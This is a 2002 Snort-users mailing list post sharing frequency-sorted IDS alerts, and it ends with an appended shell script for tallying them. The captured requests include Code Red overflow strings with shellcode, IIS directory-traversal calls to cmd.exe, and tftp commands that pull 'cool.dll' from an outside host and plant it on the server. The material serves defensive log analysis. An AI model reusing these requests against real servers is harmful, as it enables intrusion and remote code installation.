From: Phil Wood (cpwlanl.gov)
Date: Sat Feb 09 2002 - 21:32:00 CST

    56 minutes of snort web rules alerts starting Sat Feb 9 18:52:57 MST.
    The leading number is frequency. (sort file | uniq -c | sort -rn).
    Check out the moron that is going to pull down cool.dll.
    (No, this was not captured on my home machine.)

       6244 GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
       4999 GET /scripts/..%c../winnt/system32/cmd.exe?/c+dir dir HTTP/1.0
       2514 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir r HTTP/1.0
       1303 GET /scripts/root.exe?/c+dir HTTP/1.0
       1290 GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
       1286 GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
       1279 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir c+dir HTTP/1.0
       1268 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir c+dir HTTP/1.0
       1259 GET /msadc/..%5c../..%5c../..%5c/..55../..c1../../.../winnt/system32/cmd.exe?/c+dir 32/cmd.exe?/c+dir HTTP/1.0
       1237 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir dir HTTP/1.0
       1233 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir c+dir HTTP/1.0
       1228 GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir r HTTP/1.0
         40 GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
          4 GET /scripts/..%c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll \httpodbc.dll HTTP/1.0
          4 GET /scripts/..%c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll \httpodbc.dll HTTP/1.0
          4 GET /scripts/..%c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll \httpodbc.dll HTTP/1.0
          2 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll ttpodbc.dll HTTP/1.0
          2 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll ttpodbc.dll HTTP/1.0
          2 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll ttpodbc.dll HTTP/1.0
          2 GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
          1 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll e:\httpodbc.dll HTTP/1.0
          1 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll d:\httpodbc.dll HTTP/1.0
          1 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll c:\httpodbc.dll HTTP/1.0
          1 GET /scripts/root.exe?/c+tftp -i 172.16.102.254 GET cool.dll httpodbc.dll podbc.dll HTTP/1.0
          1 GET /scripts/debug/HM_ScriptDOM.js HTTP/1.1
          1 GET /scripts/debug/HM_ArraysSiteMapLab_sub.js HTTP/1.1
          1 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll \httpodbc.dll HTTP/1.0
          1 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll e:\httpodbc.dll HTTP/1.0
          1 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll \httpodbc.dll HTTP/1.0
          1 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll d:\httpodbc.dll HTTP/1.0
          1 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll \httpodbc.dll HTTP/1.0
          1 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll c:\httpodbc.dll HTTP/1.0
          1 GET /scripts/..%2f../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll ttpodbc.dll HTTP/1.0
          1 GET /scripts/..%2f../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll ttpodbc.dll HTTP/1.0
          1 GET /scripts/..%2f../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll ttpodbc.dll HTTP/1.0
          1 GET /msadc/..%5c../..%5c../..%5c/..55../..c1../../.../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll 0cool.dll%20e:\httpodbc.dll HTTP/1.0
          1 GET /msadc/..%5c../..%5c../..%5c/..55../..c1../../.../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll 0cool.dll%20d:\httpodbc.dll HTTP/1.0
          1 GET /msadc/..%5c../..%5c../..%5c/..55../..c1../../.../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll 0cool.dll%20c:\httpodbc.dll HTTP/1.0
          1 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll e:\httpodbc.dll HTTP/1.0
          1 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll d:\httpodbc.dll HTTP/1.0
          1 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll c:\httpodbc.dll HTTP/1.0
          1 GET /intranet/pitchang_combined/1day/1997-148.html HTTP/1.0
          1 GET /d/winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll podbc.dll HTTP/1.0
          1 GET /d/winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll podbc.dll HTTP/1.0
          1 GET /d/winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll podbc.dll HTTP/1.0
          1 GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
          1 GET /default.ida?
          1 GET /c/winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll podbc.dll HTTP/1.0
          1 GET /c/winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll podbc.dll HTTP/1.0
          1 GET /c/winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll podbc.dll HTTP/1.0
          1 GET /c

    Now for another beer.

    _______________________________________________
    Snort-users mailing list
    Snort-userslists.sourceforge.net
    Go to this URL to change user options or unsubscribe:
    https://lists.sourceforge.net/lists/listinfo/snort-users
    Snort-users list archive:
    http://www.geocrawler.com/redir-sf.php3?list=snort-users
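An added example, not part of the original post: the `sort file | uniq -c | sort -rn` tally above counts every drive-letter and traversal-encoding variant separately, so this sketch first collapses each request line into a family and then counts, and it lists the hosts named after `tftp -i`. The function names, the family labels and the abridged sample lines are assumptions made for illustration; the sample is constructed from the request shapes in the listing.

```shell
#!/bin/sh
# Added example (not from the original post): family-level tally of request
# lines, one request per line on stdin, as in the post's "file".

classify() {
    # Map each request line to a family label (labels are hypothetical).
    awk '{
        req = tolower($0)
        if (req ~ /\/default\.ida\?/)                 fam = "ida-overflow"
        else if (req ~ /(cmd|root)\.exe\?\/c\+tftp/)  fam = "shell-tftp-fetch"
        else if (req ~ /(cmd|root)\.exe\?\/c\+dir/)   fam = "shell-dir-probe"
        else                                          fam = "other"
        print fam
    }'
}

triage() {
    # Same pipeline as the post, applied to families instead of raw lines.
    classify | sort | uniq -c | sort -rn | awk '{print $1, $2}'
}

tftp_sources() {
    # Distinct hosts a request asked the server to fetch from via tftp.
    grep -iF 'c+tftp' | sed -n 's/.*tftp -i \([0-9.]*\) .*/\1/p' | sort -u
}

# Constructed sample: abridged lines in the shapes shown in the listing.
sample_requests() {
cat <<'EOF'
GET /scripts/root.exe?/c+dir HTTP/1.0
GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/root.exe?/c+tftp -i 172.16.102.254 GET cool.dll httpodbc.dll HTTP/1.0
GET /d/winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll HTTP/1.0
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll HTTP/1.0
GET /default.ida?NNNNNNNNNNNNNNNN HTTP/1.0
GET /default.ida?NNNNNNNNNNNNNNNN%u9090%u6858=a HTTP/1.0
GET /scripts/debug/HM_ScriptDOM.js HTTP/1.1
EOF
}

sample_requests | triage
sample_requests | tftp_sources
```

The `other` family is worth reading by hand: in the listing it holds ordinary page requests that the web rules flagged only because of their path.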